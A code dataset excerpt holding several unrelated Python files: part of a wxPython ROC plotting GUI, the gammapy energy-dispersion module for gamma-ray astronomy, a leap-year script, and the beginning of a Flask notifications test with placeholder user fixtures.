flag=wx.ALL | wx.EXPAND)\n \n \n self.RightPanel.SetSizer(self.FlexGridSizer)\n\n # 状态栏\n self.StatusBar()\n\n # MPL2_Frame界面居中显示\n self.Centre(wx.BOTH)\n\n\n\n # 按钮事件,用于测试\n\n def Button1Event(self, event):\n logistic.colicTest(int(self.timeText.GetValue()))\n dlg = wx.MessageDialog(self,self.timeText.GetValue()+\" training sessions have been completed.\",'Message', wx.OK | wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n def Button2Event(self, event):\n \n auc=roc_auc.auc_calculate()\n self.MPL.clean()\n x,y = roc_auc.get_x_y()\n self.MPL.plot(x, y, ':^b')\n self.MPL.ShowHelpString('AUC={:.6f}'.format(auc))\n self.MPL.xticker(0.2, 0.02)\n self.MPL.yticker(0.2, 0.02)\n self.MPL.title_MPL(\"ROC\")\n self.MPL.grid()\n self.MPL.UpdatePlot()\n\n def Button3Event(self, event):\n f = open('mrtest.txt','r')\n data=''\n for i in f.readlines():\n data=data+'('+str(i).strip() +')'\n dlg = wx.MessageDialog(self,data,'Data', wx.OK | wx.ICON_INFORMATION)\n dlg.ShowModal()\n dlg.Destroy()\n\n # 自动创建状态栏\n\n def StatusBar(self):\n self.statusbar = self.CreateStatusBar()\n self.statusbar.SetFieldsCount(3)\n self.statusbar.SetStatusWidths([-2, -2, -1])\n\n\nif __name__ == '__main__':\n app = wx.App()\n frame = MPL2_Frame()\n frame.Center()\n frame.Show()\n app.MainLoop()\n","sub_path":"_mushroom/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":6865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401217425","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.coordinates import Angle\nfrom astropy.units import Quantity\nfrom astropy.table import Table\nfrom ..utils.energy import EnergyBounds, Energy\nfrom ..utils.array import array_stats_str\nfrom ..utils.scripts import make_path\nfrom ..utils.nddata import NDDataArray, BinnedDataAxis\nfrom ..utils.fits import energy_axis_to_ebounds\n\n__all__ = [\n 'EnergyDispersion',\n 'EnergyDispersion2D',\n]\n\n\nclass EnergyDispersion(NDDataArray):\n \"\"\"Energy dispersion matrix.\n\n We use a dense matrix (`numpy.ndarray`) for the energy dispersion matrix.\n An alternative would be to store a sparse matrix\n (`scipy.sparse.csc_matrix`). It's not clear which would be more efficient\n for typical gamma-ray energy dispersion matrices.\n\n The most common file format for energy dispersion matrices is the RMF\n (Redistribution Matrix File) format from X-ray astronomy:\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/summary/cal_gen_92_002_summary.html\n\n Parameters\n ----------\n data : array_like\n 2-dim energy dispersion matrix (probability density).\n e_true : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of true energy axis\n e_reco : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of reconstruced energy axis\n \"\"\"\n e_true = BinnedDataAxis(interpolation_mode='log')\n \"\"\"True energy axis\"\"\"\n e_reco = BinnedDataAxis(interpolation_mode='log')\n \"\"\"Reconstructed energy axis\"\"\"\n axis_names = ['e_true', 'e_reco']\n \"\"\"Axis names (in order)\"\"\"\n interp_kwargs = dict(bounds_error=False, fill_value=0)\n \"\"\"Interpolation kwargs\"\"\"\n\n @property\n def pdf_matrix(self):\n \"\"\"PDF matrix `~numpy.ndarray`\n\n Rows (first index): True Energy\n Columns (second index): Reco Energy\n \"\"\"\n return self.data\n\n def pdf_in_safe_range(self, lo_threshold, hi_threshold):\n \"\"\"PDF matrix with bins outside threshold set to 0\n \n Parameters\n ----------\n lo_threshold : `~astropy.units.Quantity`\n Low reco energy threshold\n hi_threshold : `~astropy.units.Quantity`\n High reco energy threshold\n \"\"\"\n data = self.data.copy()\n idx = np.where((self.e_reco.data[:-1] < lo_threshold) |\n (self.e_reco.data[1:] > hi_threshold))\n data[:,idx] = 0\n return data\n\n @classmethod\n def from_gauss(cls, e_true, e_reco, sigma=0.2, pdf_threshold=1e-6):\n \"\"\"Create Gaussian `EnergyDispersion` matrix.\n\n The output matrix will be Gaussian in log(e_true / e_reco)\n\n TODO: extend to have a vector of bias various true energies.\n TODO: extend to have vector of resolution for various true energies.\n TODO: give formula: Gaussian in log(e_reco)\n TODO: add option to add poisson noise\n\n Parameters\n ----------\n e_true : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of true energy axis\n e_reco : `~astropy.units.Quantity`, `~gammapy.utils.nddata.BinnedDataAxis`\n Bin edges of reconstructed energy axis\n sigma : float, optional\n RMS width of Gaussian energy dispersion, resolution\n pdf_threshold : float, optional\n Zero suppression threshold\n \"\"\"\n from scipy.special import erf\n\n # Init array without data\n retval = cls(e_true=e_true, e_reco=e_reco)\n\n # erf does not work with Quantities\n reco = retval.e_reco.data.to('TeV').value\n true = retval.e_true.nodes.to('TeV').value\n migra_min = np.log10(reco[:-1] / true[:, np.newaxis])\n migra_max = np.log10(reco[1:] / true[:, np.newaxis])\n\n pdf = .5 * (erf(migra_max / (np.sqrt(2.) * sigma))\n - erf(migra_min / (np.sqrt(2.) * sigma)))\n\n pdf[np.where(pdf < pdf_threshold)] = 0\n retval.data = pdf\n\n return retval\n\n @classmethod\n def from_hdulist(cls, hdu_list):\n \"\"\"Create `EnergyDispersion` object from `~astropy.io.fits.HDUList`.\n\n Parameters\n ----------\n hdu_list : `~astropy.io.fits.HDUList`\n HDU list with ``MATRIX`` and ``EBOUNDS`` extensions.\n \"\"\"\n data = hdu_list['MATRIX'].data\n header = hdu_list['MATRIX'].header\n\n pdf_matrix = np.zeros([len(data), header['DETCHANS']], dtype=np.float64)\n\n for i, l in enumerate(data):\n if l.field('N_GRP'):\n m_start = 0\n for k in range(l.field('N_GRP')):\n pdf_matrix[i, l.field('F_CHAN')[k]: l.field(\n 'F_CHAN')[k] + l.field('N_CHAN')[k]] = l.field(\n 'MATRIX')[m_start:m_start + l.field('N_CHAN')[k]]\n m_start += l.field('N_CHAN')[k]\n\n e_reco = EnergyBounds.from_ebounds(hdu_list['EBOUNDS'])\n e_true = EnergyBounds.from_rmf_matrix(hdu_list['MATRIX'])\n\n return cls(data=pdf_matrix, e_true=e_true, e_reco=e_reco)\n\n def to_hdulist(self, **kwargs):\n \"\"\"\n Convert RM to FITS HDU list format.\n\n Parameters\n ----------\n header : `~astropy.io.fits.Header`\n Header to be written in the fits file.\n energy_unit : str\n Unit in which the energy is written in the HDU list\n\n Returns\n -------\n hdulist : `~astropy.io.fits.HDUList`\n RMF in HDU list format.\n\n Notes\n -----\n For more info on the RMF FITS file format see:\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/summary/cal_gen_92_002_summary.html\n\n \"\"\"\n # Cannot use table_to_fits here due to variable length array\n # http://docs.astropy.org/en/v1.0.4/io/fits/usage/unfamiliar.html\n\n table = self.to_table()\n name = table.meta.pop('name')\n\n header = fits.Header()\n header.update(table.meta)\n\n cols = table.columns\n c0 = fits.Column(name=cols[0].name, format='E', array=cols[0],\n unit='{}'.format(cols[0].unit))\n c1 = fits.Column(name=cols[1].name, format='E', array=cols[1],\n unit='{}'.format(cols[1].unit))\n c2 = fits.Column(name=cols[2].name, format='I', array=cols[2])\n c3 = fits.Column(name=cols[3].name, format='PI()', array=cols[3])\n c4 = fits.Column(name=cols[4].name, format='PI()', array=cols[4])\n c5 = fits.Column(name=cols[5].name, format='PE()', array=cols[5])\n\n hdu = fits.BinTableHDU.from_columns([c0, c1, c2, c3, c4, c5],\n header=header, name=name)\n\n ebounds = energy_axis_to_ebounds(self.e_reco)\n prim_hdu = fits.PrimaryHDU()\n\n return fits.HDUList([prim_hdu, hdu, ebounds])\n\n def to_table(self):\n \"\"\"Convert to `~astropy.table.Table`.\n\n The output table is in the OGIP RMF format.\n http://heasarc.gsfc.nasa.gov/docs/heasarc/caldb/docs/memos/cal_gen_92_002/cal_gen_92_002.html#Tab:1\n \"\"\"\n table = Table()\n\n rows = self.pdf_matrix.shape[0]\n n_grp = []\n f_chan = np.ndarray(dtype=np.object, shape=rows)\n n_chan = np.ndarray(dtype=np.object, shape=rows)\n matrix = np.ndarray(dtype=np.object, shape=rows)\n\n # Make RMF type matrix\n for i, row in enumerate(self.data.value):\n subsets = 1\n pos = np.nonzero(row)[0]\n borders = np.where(np.diff(pos) != 1)[0]\n # add 1 to borders for correct behaviour of np.split\n groups = np.asarray(np.split(pos, borders + 1))\n n_grp_temp = groups.shape[0] if groups.size > 0 else 1\n n_chan_temp = np.asarray([val.size for val in groups])\n try:\n f_chan_temp = np.asarray([val[0] for val in groups])\n except(IndexError):\n f_chan_temp = np.zeros(1)\n\n n_grp.append(n_grp_temp)\n f_chan[i] = f_chan_temp\n n_chan[i] = n_chan_temp\n matrix[i] = row[pos]\n\n table['ENERG_LO'] = self.e_true.data[:-1]\n table['ENERG_HI'] = self.e_true.data[1:]\n table['N_GRP'] = np.asarray(n_grp, dtype=np.int16)\n table['F_CHAN'] = f_chan\n table['N_CHAN'] = n_chan\n table['MATRIX'] = matrix\n\n # Get total number of groups and channel subsets\n numgrp, numelt = 0, 0\n for val, val2 in zip(table['N_GRP'], table['N_CHAN']):\n numgrp += np.sum(val)\n numelt += np.sum(val2)\n\n meta = dict(name='MATRIX',\n chantype='PHA',\n hduclass='OGIP',\n hduclas1='RESPONSE',\n hduclas2='RSP_MATRIX',\n detchans=self.e_reco.nbins,\n numgrp=numgrp,\n numelt=numelt,\n tlmin4=0,\n )\n\n table.meta = meta\n return table\n\n def get_resolution(self, e_true):\n \"\"\"Get energy resolution for a fiven true energy\n \n Resolution is the 1 sigma containment of the energy dispersion PDF.\n\n Parameters\n ----------\n e_true : `~astropy.units.Quantity`\n True energy\n \"\"\"\n # Variance is 2nd moment of PDF\n pdf = self.evaluate(e_true=e_true)\n mean = self._get_mean(e_true)\n temp = (self.e_reco._interp_nodes() - mean) ** 2\n var = np.sum(temp * pdf)\n return np.sqrt(var)\n\n def get_bias(self, e_true):\n r\"\"\"Get reconstruction bias for a given true energy\n \n Bias is defined as\n\n .. math::\n\n \\frac{E_{reco}-E_{true}}{E_{true}}\n\n Parameters\n ----------\n e_true : `~astropy.units.Quantity`\n True energy\n \"\"\"\n mean = self._get_mean(e_true)\n e_reco = (10 ** mean) * self.e_reco.unit\n bias = (e_true - e_reco) / e_true\n return bias\n\n def _get_mean(self, e_true):\n r\"\"\"Get mean log reconstructed energy\n \"\"\"\n # Reconstructed energy is 1st moment of PDF\n pdf = self.evaluate(e_true=e_true)\n norm = np.sum(pdf)\n temp = np.sum(pdf * self.e_reco._interp_nodes())\n return temp / norm\n\n def apply(self, data, e_reco=None):\n \"\"\"Apply energy dispersion.\n\n Computes the matrix product of ``data``\n (which typically is model flux or counts in true energy bins)\n with the energy dispersion matrix.\n\n Parameters\n ----------\n data : array_like\n 1-dim data array.\n e_reco : `~astropy.units.Quantity`, optional\n Desired energy binning of the convolved data, if provided the\n `~gammapy.irf.EnergyDispersion` is evaluated at the log centers of\n the energy axis.\n\n Returns\n -------\n convolved_data : array\n 1-dim data array after multiplication with the energy dispersion matrix\n \"\"\"\n if e_reco is None:\n e_reco = self.e_reco.nodes\n else:\n e_reco = np.sqrt(e_reco[:-1] * e_reco[1:])\n edisp_pdf = self.evaluate(e_reco=e_reco)\n return np.dot(data, edisp_pdf)\n\n def _extent(self):\n \"\"\"Extent (x0, x1, y0, y1) for plotting (4x float)\n\n x stands for true energy and y for reconstructed energy\n \"\"\"\n x = self.e_true.data[[0, -1]].value\n y = self.e_reco.data[[0, -1]].value\n return x[0], x[1], y[0], y[1]\n\n def plot_matrix(self, ax=None, show_energy=None, **kwargs):\n \"\"\"Plot PDF matrix.\n \n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis \n show_energy : `~astropy.units.Quantity`, optional\n Show energy, e.g. threshold, as vertical line\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axis\n \"\"\"\n import matplotlib.pyplot as plt\n from matplotlib.colors import PowerNorm\n\n kwargs.setdefault('cmap', 'afmhot')\n kwargs.setdefault('origin', 'bottom')\n kwargs.setdefault('interpolation', 'nearest')\n kwargs.setdefault('norm', PowerNorm(gamma=0.5))\n\n ax = plt.gca() if ax is None else ax\n\n image = self.pdf_matrix.transpose()\n ax.imshow(image, extent=self._extent(), **kwargs)\n if show_energy is not None:\n ener_val = Quantity(show_energy).to(self.reco_energy.unit).value\n ax.hlines(ener_val, 0, 200200, linestyles='dashed')\n\n ax.set_xlabel('True energy (TeV)')\n ax.set_ylabel('Reco energy (TeV)')\n\n ax.set_xscale('log')\n ax.set_yscale('log')\n\n return ax\n\n def plot_bias(self, ax=None, **kwargs):\n \"\"\"Plot reconstruction bias.\n \n see :func:`~gammapy.irf.EnergyDispersion.get_bias`\n\n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis \n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n x = self.e_true.nodes.to('TeV').value\n y = self.get_bias(self.e_true.nodes)\n\n ax.plot(x, y, **kwargs)\n ax.set_xlabel('True energy [TeV]')\n ax.set_ylabel(r'(E_{true} - E_{reco} / E_{true})')\n ax.set_xscale('log')\n return ax\n\n def to_sherpa(self, name):\n \"\"\"Return `~sherpa.astro.data.DataARF`\n \n Parameters\n ----------\n name : str\n Instance name\n \"\"\"\n from sherpa.astro.data import DataRMF\n from sherpa.utils import SherpaInt, SherpaUInt, SherpaFloat\n\n # Need to modify RMF data \n # see https://github.com/sherpa/sherpa/blob/master/sherpa/astro/io/pyfits_backend.py#L727\n\n table = self.to_table()\n n_grp = table['N_GRP'].data.astype(SherpaUInt)\n f_chan = table['F_CHAN'].data\n f_chan = np.concatenate([row for row in f_chan]).astype(SherpaUInt)\n n_chan = table['N_CHAN'].data\n n_chan = np.concatenate([row for row in n_chan]).astype(SherpaUInt)\n matrix = table['MATRIX'].data\n\n good = n_grp > 0\n matrix = matrix[good]\n matrix = np.concatenate([row for row in matrix])\n matrix = matrix.astype(SherpaFloat)\n\n # TODO: Not sure if we need this if statement\n if f_chan.ndim > 1 and n_chan.ndim > 1:\n f_chan = []\n n_chan = []\n for grp, fch, nch, in izip(n_grp, f_chan, n_chan):\n for i in xrange(grp):\n f_chan.append(fch[i])\n n_chan.append(nch[i])\n\n f_chan = numpy.asarray(f_chan, SherpaUInt)\n n_chan = numpy.asarray(n_chan, SherpaUInt)\n else:\n if len(n_grp) == len(f_chan):\n good = n_grp > 0\n f_chan = f_chan[good]\n n_chan = n_chan[good]\n\n kwargs = dict(\n name = name,\n energ_lo = table['ENERG_LO'].quantity.to('keV').value.astype(SherpaFloat),\n energ_hi = table['ENERG_HI'].quantity.to('keV').value.astype(SherpaFloat),\n matrix = matrix,\n n_grp = n_grp,\n n_chan = n_chan,\n f_chan = f_chan,\n detchans= self.e_reco.nbins,\n e_min = self.e_reco.data[:-1].to('keV').value,\n e_max = self.e_reco.data[1:].to('keV').value,\n offset=0,\n )\n\n return DataRMF(**kwargs)\n\n\nclass EnergyDispersion2D(object):\n \"\"\"Offset-dependent energy dispersion matrix.\n\n Parameters\n ----------\n etrue_lo : `~gammapy.utils.energy.Energy`\n True energy lower bounds\n etrue_hi : `~gammapy.utils.energy.Energy`\n True energy upper bounds\n migra_lo : `~numpy.ndarray`, list\n Migration lower bounds\n migra_hi : `~numpy.ndarray`, list\n Migration upper bounds\n offset_lo : `~astropy.coordinates.Angle`\n Offset lower bounds\n offset_hi : `~astropy.coordinates.Angle`\n Offset lower bounds\n dispersion : `~numpy.ndarray`\n PDF matrix\n interp_kwargs : dict or None\n Interpolation parameter dict passed to `scipy.interpolate.RegularGridInterpolator`.\n If you pass ``None``, the default ``interp_params=dict(bounds_error=False, fill_value=0)`` is used.\n\n Examples\n --------\n\n Plot migration histogram for a given offset and true energy\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n from gammapy.irf import EnergyDispersion2D\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n edisp.plot_migration()\n plt.xlim(0, 4)\n\n\n Plot evolution of bias and resolution as a function of true energy\n for a given offset\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n import numpy as np\n from gammapy.irf import EnergyDispersion2D\n from gammapy.utils.energy import Energy\n from astropy.coordinates import Angle\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n migra = np.linspace(0.1,2,80)\n e_true = Energy.equal_log_spacing(0.13,60,60,'TeV')\n offset = Angle([0.554], 'deg')\n edisp.plot_bias(offset=offset, e_true=e_true, migra=migra)\n plt.xscale('log')\n\n Create RMF matrix\n\n .. plot::\n :include-source:\n\n import matplotlib.pyplot as plt\n from gammapy.irf import EnergyDispersion2D\n from gammapy.utils.energy import EnergyBounds\n filename = '$GAMMAPY_EXTRA/test_datasets/irf/hess/pa/hess_edisp_2d_023523.fits.gz'\n edisp = EnergyDispersion2D.read(filename, hdu='ENERGY DISPERSION')\n e_axis = EnergyBounds.equal_log_spacing(0.1,20,60, 'TeV')\n rmf = edisp.to_energy_dispersion('1.2 deg', e_reco = e_axis, e_true = e_axis)\n rmf.plot_matrix()\n plt.loglog()\n\n \"\"\"\n\n def __init__(self, etrue_lo, etrue_hi, migra_lo, migra_hi, offset_lo,\n offset_hi, dispersion, interp_kwargs=None):\n\n if not isinstance(etrue_lo, Quantity) or not isinstance(etrue_hi, Quantity):\n raise ValueError(\"Energies must be Quantity objects.\")\n if not isinstance(offset_lo, Angle) or not isinstance(offset_hi, Angle):\n raise ValueError(\"Offsets must be Angle objects.\")\n\n self.migra_lo = migra_lo\n self.migra_hi = migra_hi\n self.offset_lo = offset_lo\n self.offset_hi = offset_hi\n self.dispersion = dispersion\n\n self.ebounds = EnergyBounds.from_lower_and_upper_bounds(etrue_lo, etrue_hi)\n self.energy = self.ebounds.log_centers\n self.offset = (offset_hi + offset_lo) / 2\n self.migra = (migra_hi + migra_lo) / 2\n\n if not interp_kwargs:\n interp_kwargs = dict(bounds_error=False, fill_value=0)\n\n self._prepare_linear_interpolator(interp_kwargs)\n\n @classmethod\n def from_fits(cls, hdu):\n \"\"\"Create from a FITS HDU.\n\n Parameters\n ----------\n hdu : `~astropy.io.fits.BinTableHDU`\n ``ENERGY DISPERSION`` extension.\n\n \"\"\"\n data = hdu.data\n header = hdu.header\n e_lo = EnergyBounds(data['ETRUE_LO'].squeeze(), header['TUNIT1'])\n e_hi = EnergyBounds(data['ETRUE_HI'].squeeze(), header['TUNIT2'])\n o_lo = Angle(data['THETA_LO'].squeeze(), header['TUNIT5'])\n o_hi = Angle(data['THETA_HI'].squeeze(), header['TUNIT6'])\n m_lo = data['MIGRA_LO'].squeeze()\n m_hi = data['MIGRA_HI'].squeeze()\n matrix = data['MATRIX'].squeeze()\n\n return cls(e_lo, e_hi, m_lo, m_hi, o_lo, o_hi, matrix)\n\n @classmethod\n def read(cls, filename, hdu='edisp_2d'):\n \"\"\"Read from FITS file.\n\n See :ref:`gadf:edisp_2d`\n\n Parameters\n ----------\n filename : str\n File name\n \"\"\"\n filename = make_path(filename)\n hdulist = fits.open(str(filename))\n hdu = hdulist[hdu]\n return cls.from_fits(hdu)\n\n def evaluate(self, offset=None, e_true=None, migra=None):\n \"\"\"Probability for a given offset, true energy, and migration\n\n Parameters\n ----------\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.ndarray`, optional\n Energy migration e_reco/e_true\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n \"\"\"\n\n offset = self.offset if offset is None else Angle(offset)\n e_true = self.energy if e_true is None else Energy(e_true)\n migra = self.migra if migra is None else migra\n\n offset = offset.to('deg')\n e_true = e_true.to('TeV')\n\n val = self._eval(offset=offset, e_true=e_true, migra=migra)\n\n return val\n\n def _eval(self, offset=None, e_true=None, migra=None):\n\n x = np.atleast_1d(offset.value)\n y = np.atleast_1d(migra)\n z = np.atleast_1d(np.log10(e_true.value))\n in_shape = (x.size, y.size, z.size)\n\n pts = [[xx, yy, zz] for xx in x for yy in y for zz in z]\n val_array = self._linear(pts)\n\n return val_array.reshape(in_shape).squeeze()\n\n def to_energy_dispersion(self, offset, e_true=None, e_reco=None):\n \"\"\"Detector response R(Delta E_reco, Delta E_true)\n\n Probability to reconstruct an energy in a given true energy band\n in a given reconstructed energy band\n\n Parameters\n ----------\n offset : `~astropy.coordinates.Angle`\n Offset\n e_true : `~gammapy.utils.energy.EnergyBounds`, None\n True energy axis\n e_reco : `~gammapy.utils.energy.EnergyBounds`\n Reconstructed energy axis\n\n Returns\n -------\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy disperion matrix\n \"\"\"\n offset = Angle(offset)\n e_true = self.ebounds if e_true is None else EnergyBounds(e_true)\n e_reco = self.ebounds if e_reco is None else EnergyBounds(e_reco)\n\n rm = []\n\n for energy in e_true.log_centers:\n vec = self.get_response(offset=offset, e_true=energy, e_reco=e_reco)\n rm.append(vec)\n\n rm = np.asarray(rm)\n return EnergyDispersion(data=rm, e_true=e_true, e_reco=e_reco)\n\n def get_response(self, offset, e_true, e_reco=None):\n \"\"\"Detector response R(Delta E_reco, E_true)\n\n Probability to reconstruct a given true energy in a given reconstructed\n energy band. The `~gammapy.irf.EnergyDispersion2D` is evaluated at the\n reco energy bin centers and the result is multiplied with the bin\n width.\n\n Parameters\n ----------\n e_true : `~gammapy.utils.energy.Energy`\n True energy\n e_reco : `~gammapy.utils.energy.EnergyBounds`, None\n Reconstructed energy axis\n offset : `~astropy.coordinates.Angle`\n Offset\n\n Returns\n -------\n rv : `~numpy.ndarray`\n Redistribution vector\n \"\"\"\n\n e_true = Energy(e_true)\n\n # Default: e_reco nodes = migra nodes * e_true nodes\n if e_reco is None:\n e_reco = EnergyBounds.from_lower_and_upper_bounds(\n self.migra_lo * e_true, self.migra_hi * e_true)\n migra = self.migra\n\n # Translate given e_reco binning to migra at bin center\n else:\n e_reco = EnergyBounds(e_reco)\n center = e_reco.log_centers\n migra = center / e_true\n\n val = self.evaluate(offset=offset, e_true=e_true, migra=migra)\n\n # Multiply by migra bin width (~Integration)\n rv = val * (e_reco.bands / e_true)\n\n return rv.value\n\n def plot_migration(self, ax=None, offset=None, e_true=None,\n migra=None, **kwargs):\n \"\"\"Plot energy dispersion for given offset and true energy.\n\n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.array`, list, optional\n Migration nodes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axis\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle([1], 'deg')\n else:\n offset = np.atleast_1d(Angle(offset))\n if e_true is None:\n e_true = Energy([0.1, 1, 10], 'TeV')\n else:\n e_true = np.atleast_1d(Energy(e_true))\n migra = self.migra if migra is None else migra\n\n for ener in e_true:\n for off in offset:\n disp = self.evaluate(offset=off, e_true=ener, migra=migra)\n label = 'offset = {0:.1f}\\nenergy = {1:.1f}'.format(off, ener)\n ax.plot(migra, disp, label=label, **kwargs)\n\n ax.set_xlabel('E_Reco / E_True')\n ax.set_ylabel('Probability density')\n ax.legend(loc='upper left')\n\n return ax\n\n def plot_bias(self, ax=None, offset=None, e_true=None,\n migra=None, **kwargs):\n \"\"\"Plot migration as a function of true energy for a given offset\n\n Parameters\n ----------\n ax : `~matplotlib.axes.Axes`, optional\n Axis\n offset : `~astropy.coordinates.Angle`, optional\n Offset\n e_true : `~gammapy.utils.energy.Energy`, optional\n True energy\n migra : `~numpy.array`, list, optional\n Migration nodes\n\n Returns\n -------\n ax : `~matplotlib.axes.Axes`\n Axis\n \"\"\"\n from matplotlib.colors import PowerNorm\n import matplotlib.pyplot as plt\n\n kwargs.setdefault('cmap', 'afmhot')\n kwargs.setdefault('norm', PowerNorm(gamma=0.5))\n\n ax = plt.gca() if ax is None else ax\n\n if offset is None:\n offset = Angle([1], 'deg')\n if e_true is None:\n e_true = self.energy\n if migra is None:\n migra = self.migra\n\n z = self.evaluate(offset=offset, e_true=e_true, migra=migra)\n x = e_true.value\n y = migra\n\n ax.pcolor(x, y, z, **kwargs)\n ax.semilogx()\n ax.set_xlabel('Energy (TeV)')\n ax.set_ylabel('E_Reco / E_true')\n\n return ax\n\n def peek(self, figsize=(15, 5)):\n \"\"\"Quick-look summary plots.\n\n Parameters\n ----------\n figsize : (float, float)\n Size of the resulting plot\n \"\"\"\n import matplotlib.pyplot as plt\n fig, axes = plt.subplots(nrows=1, ncols=3, figsize=figsize)\n self.plot_bias(ax=axes[0])\n self.plot_migration(ax=axes[1])\n edisp = self.to_energy_dispersion(offset='1 deg')\n edisp.plot_matrix(ax=axes[2])\n\n plt.tight_layout()\n plt.show()\n return fig\n\n def _prepare_linear_interpolator(self, interp_kwargs):\n from scipy.interpolate import RegularGridInterpolator\n\n x = self.offset\n y = self.migra\n z = np.log10(self.energy.value)\n points = (x, y, z)\n values = self.dispersion\n\n self._linear = RegularGridInterpolator(points, values, **interp_kwargs)\n\n def info(self):\n \"\"\"Print some basic info.\n \"\"\"\n ss = \"\\nSummary EnergyDispersion2D info\\n\"\n ss += \"--------------------------------\\n\"\n # Summarise data members\n ss += array_stats_str(self.energy, 'energy')\n ss += array_stats_str(self.offset, 'offset')\n ss += array_stats_str(self.migra, 'migra')\n ss += array_stats_str(self.dispersion, 'dispersion')\n\n energy = Energy('1 TeV')\n e_reco = EnergyBounds([0.8, 1.2], 'TeV')\n offset = Angle('0.5 deg')\n p = self.get_response(offset, energy, e_reco)[0]\n\n ss += 'Probability to reconstruct a {} photon in the range {} at {}' \\\n ' offset: {:.2f}'.format(energy, e_reco, offset, p)\n\n return ss\n","sub_path":"gammapy/irf/energy_dispersion.py","file_name":"energy_dispersion.py","file_ext":"py","file_size_in_byte":28444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"512650392","text":"'''John Nguyen 998808398'''\n'''This program will check if a year is a leap year or not'''\n\nyear = int(input('Please enter a year: '))\n\nif year % 4 == 0 and year % 100 != 0 or year % 400 == 0:\n print('%d is a leap year.' % (year))\nelse:\n\tprint('%d is not a leap year.' % (year))\n\n\n\n\t","sub_path":"isleapyear.py","file_name":"isleapyear.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191664022","text":"import datetime\nimport json\nimport flask_sse\n\n\nfrom unittest import mock\nfrom unittest.mock import patch\nfrom flask_sse import sse\n\n\nfrom learning_map_api.api.models import (db, Contribution, Notification, User,\n ContributionType, Path, Level)\nfrom learning_map_api.test.base import BaseTestCase, generate_token\n\n\nclass NotificationsTestCase(BaseTestCase):\n\n exp_date = datetime.datetime.utcnow()\n regular_payload = {\n 'UserInfo': {\n 'id': '-KJKcv0D',\n 'email': 'test.test@andela.com',\n 'first_name': 'test',\n 'last_name': 'test',\n 'name': 'test test',\n 'picture': 'https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50',\n 'roles': {\n 'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid'\n }\n },\n 'exp': exp_date + datetime.timedelta(days=1)\n }\n regular_header = {\n \"Authorization\": generate_token(regular_payload, 'secret')\n }\n\n\n\n def setUp(self):\n db.drop_all()\n db.create_all()\n self.admin_user = User(\n id=\"-Ktestasminid\",\n email=\"testadmin.test@andela.com\",\n name=\"admin admin\",\n roles={\n \"Andelan\": \"-Ktestandelanid\",\n \"Fellow\": \"-Ktestfellowid\",\n \"LMAP_ADMIN\": \"-Ktestadminid\"\n },\n image_url='https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50')\n self.admin_user.save()\n admin_payload = {\n 'UserInfo': {\n 'id': '-Ktestasminid',\n 'email': 'test.testAdmin@andela.com',\n 'first_name': 'testAdmin',\n 'last_name': 'testAdmin',\n 'name': 'test Admin',\n 'picture': 'https://lh6.googleusercontent.com/-1DhBLOJentg'\n '/AAAAAAAAAAI/AAAAAAAAABc/ImM13eP_cAI/photo.jpg?sz=50',\n 'roles': {\n 'Andelan': '-Ktestandelanid',\n 'Fellow': '-Ktestfellowid',\n 'LMAP_ADMIN': '-Ktestasminid'\n }},\n 'exp': NotificationsTestCase.exp_date + datetime.timedelta(days=1)}\n\n self.admin_header = {\n \"Authorization\": generate_token(admin_payload, 'secret')}\n\n self.path = Path(name=\"JS developer\", description=\"JS developer for d1\"\n )\n self.path.save()\n self.d0 = Level(name=\"d0\")\n self.d0.save()\n self.resource = ContributionType(name=\"resource\")\n self.resource.save()\n\n self.contribution = Contribution(\n id=\"-KA4Q0D45T7\",\n description=\"http://www.python.com\",\n title=\"Data Science\",\n user_id=\"-KJKcv0D\",\n contribution_type=self.resource,\n contribution_type_id=self.resource.id,\n level_id=self.d0.id,\n path_id=self.path.id)\n\n self.contribution.save()\n self.regular_user = User(\n id=\"-KJKcv0D\",\n email=\"test.test@andela.com\",\n 